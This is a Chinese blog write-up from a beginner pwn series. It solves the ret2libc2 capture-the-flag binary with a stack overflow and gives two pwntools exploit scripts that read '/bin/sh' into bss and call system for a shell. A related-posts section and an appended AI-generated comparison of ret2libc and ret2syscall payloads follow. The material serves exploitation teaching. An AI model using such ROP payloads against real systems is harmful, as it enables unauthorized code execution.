栈溢出入门0x06 ret2libc2

已于 2024-10-03 19:22:23 修改
阅读量164 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: pwn 文章标签: linux
于 2024-10-03 19:20:24 首次发布
原文链接:https://blog.csdn.net/ATFWUS/article/details/104565483

前言:

本博客非原创博客, 内容大部分都来自参考文献链接。

ret2libc1中system函数是动态库里的函数,且已经在plt表中了;并且也有“/bin/sh”。这太过简单了,所以增加点难度——如果没有“/bin/sh”怎么办?还是得自己读入一个。

题目:ret2libc2

链接:https://pan.baidu.com/s/1Lncq6vrUNEJ7vLKvTQ_gsA
提取码:yywk

分析:

checksec:

        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)

IDA:

int __cdecl main(int argc, const char **argv, const char **envp)
    {
      char s; // [esp+1Ch] [ebp-64h]

      setvbuf(stdout, 0, 2, 0);
      setvbuf(_bss_start, 0, 1, 0);
      puts("Something surprise here, but I don't think it will work.");
      printf("What do you think ?");
      gets(&s);
      return 0;
    }

从IDA里查找可以发现system函数但是没有“/bin/sh”,所以需要自己读一个,进而需要找个缓冲区。

找到system的地址:

                                                                                图1

 sytem地址:0x08048490

没有找到bin/sh,所有我们可以自己制造一个。
先再bss段找一个变量:

                                                                                图2

 buf2的地址为:0x0804A080

我们需要调用gets函数,读取一个bin/sh放在buf2,然后找到gets函数,去plt表看:

                                                                                图3

gets地址为:0x08048460。

得到偏移量:

                                                                                图4

exp:

from pwn import*
r=process('./ret2libc2')
sys_adr=0x08048490
gets_adr=0x08048460
buf2_adr=0x0804A080

payload=flat([112*'A',gets_adr,sys_adr,buf2_adr,buf2_adr])

r.sendline(payload)
r.sendline('/bin/sh')
r.interactive()

需要再寻找一个pop(作用后面说):

    ROPgadget --binary ret2libc2 --only 'pop|ret'| grep 'ebx'
    0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
    0x0804843d : pop ebx ; ret
pop ebx地址为:0x0804843d 

##!/usr/bin/env python
from pwn import*

r=process('./ret2libc2')

sys_adr=0x08048490
gets_adr=0x08048460
buf2_adr=0x0804A080
pop_ebx=0x0804843D

payload=flat([112*'A',gets_adr,pop_ebx,buf2_adr,sys_adr,'AAAA',buf2_adr])
#payload=flat([112*'A',gets_adr,sys_adr,buf2_adr,buf2_adr])

r.sendline(payload)
r.sendline('/bin/sh')
r.interactive()

pop ebx在此处的作用就是将gets函数的参数给pop掉。程序运行时是这样的:程序溢出后先运行到gets函数,然后gets函数返回后正好是pop ebx,这时候就会把buf2的地址pop到ebx中,然后继续运行就到了system函数的位置。

总结:

由于没有/bin/sh字符串,所有我们需要自己制造一个出来,利用存在的gts函数,读取一个/bin/sh到bss段的buf2处,再在后面的调用中把buf2作为参数。
第一种方法,栈分步应该是这样的,从上到下(低地址到高地址):
    gets地址
    system地址(也是gets的返回地址)
    buf2(是gets的参数)
    buf2(是system的参数)
第二种方法:
    gets地址
    pop ebx ;ret地址
    buf2(gets的参数)
    system地址
    system的返回地址('AAAA')
    buf2(system的参数)
第一种方法很好理解。
第二种方法就是在调用gets函数后,把参数buf2给pop掉,这样返回地址就变成了system,就会返回到system。

参看文献:

看人家写的不错,基本上没修改

ROP-基础-ret2libc2_ret2libc2下载-CSDN博客

[NewStarCTF 公开赛赛道]ret2libc(BUUCTF)
Welcome To Myon'Blog !
05-20 815
本文描述了一个64位程序的栈溢出漏洞利用过程。程序开启了NX保护,且没有直接提供/bin/sh字符串和system函数。通过分析,作者采用了ret2libc攻击思路,利用puts函数泄露其真实地址,进而计算libc基址,获取system函数和/bin/sh字符串的地址。首先,通过构造第一个payload,利用pop_rdi和ret指令将puts函数的真实地址泄露出来,并返回到main函数。接着,构造第二个payload,将/bin/sh字符串地址传入rdi寄存器,调用system函数,最终成功获取shell
从零开始学逆向:理解ret2libc-2
weixin_44626085的博客
02-20 1371
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')。这道题与例题1基本相似,只是程序中没有了/bin/sh字符串,我们需要通过gets函数手动写入/bin/sh字符串到一个可写可执行区域,通常在bss段,在ida找到一个地址
pwn学习——ret2libc2
MrTreebook的博客
11-28 1257
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
ret2libc2
m0_54262894的博客
10-30 378
ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 先检查保护 放入ida 发现gets函数 Shift+F12 (因为在比赛中不会给你提示有没有 /bin/sh ,所以还是需要自己找一下) 两个方法都没有发现/bin/sh...
基本ROP之ret2libc2
至臻求学,胸怀云月
02-14 3829
原理 ret2libc即控制函数执行libc中的函数,通常是返回至某个函数plt表处或者函数的具体位置(即函数对应的got表项的内容),一般情况下我们选择执行system("/bin/sh"),故而我们需要知道system函数的地址 过程 下载地址:url checksec IDA分析 gets函数 system函数 经计算gets字符串和ebp的偏移为108,这里不进行赘述 查找bin/s...
pwn入门系列-ret2libc2
小心信科理化声
12-10 3237
Ret2libc2 今天来做一下经典的retlibc系列的第二题 资源:ret2libc2 老样子先checksec [*] '/home/giantbranch/Desktop/pwn/ret2libc2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 可以看到
好好说话之ret2libc2
hollk’s blog
06-22 1450
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc2 看C代码 #include <stdio.h> #include <stdlib.h> #include <time.h> char buf2[100]; void secure(void) { int secretcode, inpu...
栈溢出入门0x07 ret2libc3&Hijack GOT
砖家
10-04 1108
使用patchelf保证ret2libc3的实验结果一致性,先泄露函数地址后得到libc版本和加载基地址之后计算出system和/bin/sh的真实加载地址,从而getshell
栈溢出入门0x05 ret2libc1
砖家
10-03 1118
程序中自身就含有system函数和"/bin/sh"字符串程序中自身就有system函数,但是没有"/bin/sh"字符串程序中自身就没有system函数和"/bin/sh"字符串,但给出了libc.so文件程序中自身就没有system函数和"/bin/sh"字符串,并且没有给出libc.so文件一般需要用到ret2libc的时候就是无法注入shellcode了,也没有int 80可用,更没有后门函数了。
堆栈认知——栈溢出实例(ret2libc)_栈溢出举例
2301_76348171的博客
04-06 956
我们可在栈溢出的时候,再让其执行gets函数,给其输入一个“/bin/sh”就好啦,值得注意的是:我们输入的“/bin/sh”需要放到bss段中的一个地址上去,因为这个不会随着函数的栈被覆盖或回收等机制导致我们找不到“/bin/sh”的地址了。注意:在泄露的时候我们需要通过gets函数的got表地址加偏移来泄露got表中的system函数地址,具体含义可百度一下,这里不过过深的说明。到此时我们就到了gets函数的libc中的地址,那么接下来我们就要获取system函数在libc中的地址。
linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
weixin_34185033的博客
05-01 794
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc2pwn 入门
02-11
pwn 入门
ret2libc类型题目思考-ret2libc2
qq_30528603的博客
06-03 482
解析一下这样的布局,因为是栈溢出,所以我们要在溢出点做手脚填充112个字节的a来覆盖到返回地址,如何计算的填充数据的大小在ret2libc1中有很详细的讲解,这里就不再赘述,接下来,我们需要想先调用gets函数来让把我们输入的字符放入buf2,那么我们就需要调用gets函数的同时,把buf2的地址当参数传给gets函数。那么又有人问,中间的pop ebx的作用又是什么呢,其实它的作用是为了堆栈平衡的,用来把用完的buf2给弹出堆栈,方便ret的时候能正确指向system函数。因此我们完整的利用链就完成了。
PWN —— ret2libc2
qq_41696518的博客
07-03 355
ret2libc2
ret2libc 2
weixin_44864859的博客
05-19 373
ret2libc 2 该题目与retlibc1基本一致,只不过不再出现 /bin/sh 字符串,所以此次需要我们自己来读取字符串,所以我们需要两个 gadgets,第一个控制程序读取字符串,第二个控制程序执行 system("/bin/sh")。 这里我们和上一题构造system函数一样构造gets函数用于读入/bin/sh字符串,然后我们需要考虑读到什么地址? 一般来说在程序运行时bss段会分配很大一段空间,所以我们在此基础上随意制定一个地址就可以了。 p.sendline('a'*112 + p32(e
ctf wiki ret2libc2
weixin_55885866的博客
05-13 251
具体思路为 构造两段gadgets ,第一段用于将字符串”/bin/sh“ 存储到某个地址。再构造system取出。注:汇编语言需要和地址p32();需要先给某个地址输入”/bin/sh“
basic rop ret2libc2
archli的博客
08-09 361
题目地址:ret2libc2 看一下ctfwiki的wp,这个题目我也并不是很明白,我只能进行一部分猜测,应该是想让第一个sendline执行读取字符串的操作,居然有这种骚操作,属实搞不懂,这种只能先记住,别无它法。 还是先让get读到ret函数,然后执行get函数,里面有一个问题就是为啥,要执行pop ebx的操作,然后bss有个buf字符串,把他用上读,我读个屁啊,算了这题问大佬吧。等着修改...
ret2libc2和ret2syscall区别
最新发布
03-23
<think>好的,我现在需要回答用户关于ret2libc和ret2syscall区别的问题。首先,我得回忆一下这两种攻击方式的基本概念,然后找出它们之间的不同点。用户提供的引用中有几个相关的资料,我需要仔细看一下这些引用内容,确保回答准确。 首先,ret2libc是一种利用程序中已有的库函数(比如system函数)的攻击方式,通常用于绕过NX保护。当程序没有提供后门函数时,攻击者可能需要泄露libc的地址,然后构造ROP链调用system函数。引用3和4提到了ret2libc的例子,比如调用system函数并传递参数如"/bin/sh"字符串的地址。 接下来是ret2syscall,这应该是指直接调用系统调用(syscall)而不是通过libc中的函数。比如在x86架构下,通过int 0x80指令,或者在x64架构下使用syscall指令来执行系统调用。这种攻击需要控制寄存器的值来传递系统调用号和参数,通常需要构造更复杂的ROP链来设置这些寄存器。 两者的主要区别在于利用的机制不同:ret2libc依赖现有的库函数,而ret2syscall直接使用系统调用。另外,ret2syscall可能不需要泄漏libc地址,但需要找到合适的gadgets来设置寄存器。而ret2libc可能需要泄漏libc基址来计算函数地址,特别是当ASLR启用时。 需要注意的是,用户提供的引用中并没有直接提到ret2syscall的具体例子,但引用2提到了栈溢出/ret2shellcode/ret2syscall/ret2libc的分类,说明ret2syscall是另一种方法。结合我的知识,ret2syscall通常涉及将返回地址指向syscall指令,并布置好寄存器参数。 另外,用户可能混淆了ret2syscall和ret2shellcode的区别。ret2shellcode是将控制流转向注入的shellcode,而ret2syscall是构造系统调用。不过根据引用中的分类,ret2syscall是独立的一种方法。 现在需要组织这些信息,分点说明两者的区别,包括原理、适用场景、利用条件以及示例。同时,根据用户提供的引用,引用3和4中的ret2libc例子可以引用作为说明,而ret2syscall可能没有直接引用,但可以结合知识进行解释。 最后,生成相关问题,可能涉及如何构造payload、如何寻找gadgets、防御措施等。确保问题与主题相关,并帮助用户进一步学习。</think>### ret2libc与ret2syscall的区别及用法比较 #### 1. **原理差异** - **ret2libc**:通过劫持程序执行流,跳转到动态链接库(如`libc.so`)中的函数(如`system`)执行。例如,构造栈帧调用`system("/bin/sh")`获取shell[^3][^4]。 - **ret2syscall**:直接触发系统调用(如`execve`),通过汇编指令(如`int 0x80`或`syscall`)实现,需控制寄存器传递参数(如`eax`存储系统调用号,`ebx`、`ecx`等存储参数)[^2]。 #### 2. **适用场景** - **ret2libc**: - 当程序开启**NX保护**(禁止执行栈上的代码)时,无法注入shellcode。 - 需要利用程序中已有的`libc`函数地址或通过泄漏`libc`基址计算目标函数地址。 - **ret2syscall**: - 当程序中存在可用的**gadget链**(如`pop eax; ret`)时。 - 需要直接调用系统调用且无需依赖`libc`函数(如绕过ASLR对`libc`的影响)。 #### 3. **利用条件对比** | 条件 | ret2libc | ret2syscall | |---------------------|-----------------------------------|----------------------------------| | **依赖库函数** | 是(如`system`、`execve`) | 否(直接调用内核接口) | | **寄存器控制** | 仅需传递参数地址(如`/bin/sh`) | 需设置多个寄存器(系统调用号+参数)| | **对抗NX保护** | 有效(不执行栈代码) | 有效 | | **对抗ASLR** | 需泄漏`libc`基址 | 可能无需泄漏(若gadget地址固定) | #### 4. **示例对比** - **ret2libc示例**(调用`system("/bin/sh")`): ```python # 构造栈帧:[溢出填充] + [system地址] + [返回地址] + [参数地址] payload = flat(['a' * 112, system_adr, 'b' * 4, binsh_adr]) ``` - **ret2syscall示例**(触发`execve("/bin/sh", 0, 0)`): ```python # 需构造gadget链设置eax=11(execve系统调用号),ebx指向"/bin/sh",ecx=0, edx=0 gadgets = [pop_eax_ret, 11, pop_ebx_ret, binsh_addr, pop_ecx_edx_ret, 0, 0, int_0x80] payload = flat(['a' * offset] + gadgets) ``` #### 5. **防御措施** - **ret2libc**:启用**ASLR**随机化`libc`基址;限制函数指针修改。 - **ret2syscall**:部署**Control Flow Integrity (CFI)** 阻止非法ROP链;减少可用gadget数量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值